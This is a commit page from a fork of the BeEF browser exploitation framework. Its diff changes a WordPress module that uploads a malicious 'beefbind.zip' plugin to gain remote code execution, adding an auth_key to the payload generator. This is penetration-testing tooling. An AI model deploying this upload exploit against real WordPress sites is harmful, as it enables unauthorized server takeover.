Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

WordPress - Adds auth_key to Plugin, Use SecureRandom and Fixes fatal error when plugin file called directly

Browse Source
This commit is contained in:
erwanlr
2019-10-27 00:09:39 +02:00
parent 151976176a
commit b6d338d334
6 changed files with 45 additions and 21 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
modules/misc/wordpress/upload_rce_plugin/command.js
View File

@@ -41,7 +41,7 @@ beef.execute(function() {
post_data += "filename=\"beefbind.zip\"\r\n";
post_data += "Content-Type: application/octet-stream\r\n";
post_data += "\r\n";
post_data += "<%= Wordpress_upload_rce_plugin.generate_zip_payload %>";
post_data += "<%= Wordpress_upload_rce_plugin.generate_zip_payload(@auth_key) %>";
post_data += "\r\n";
post_data += "--" + boundary + "--\r\n"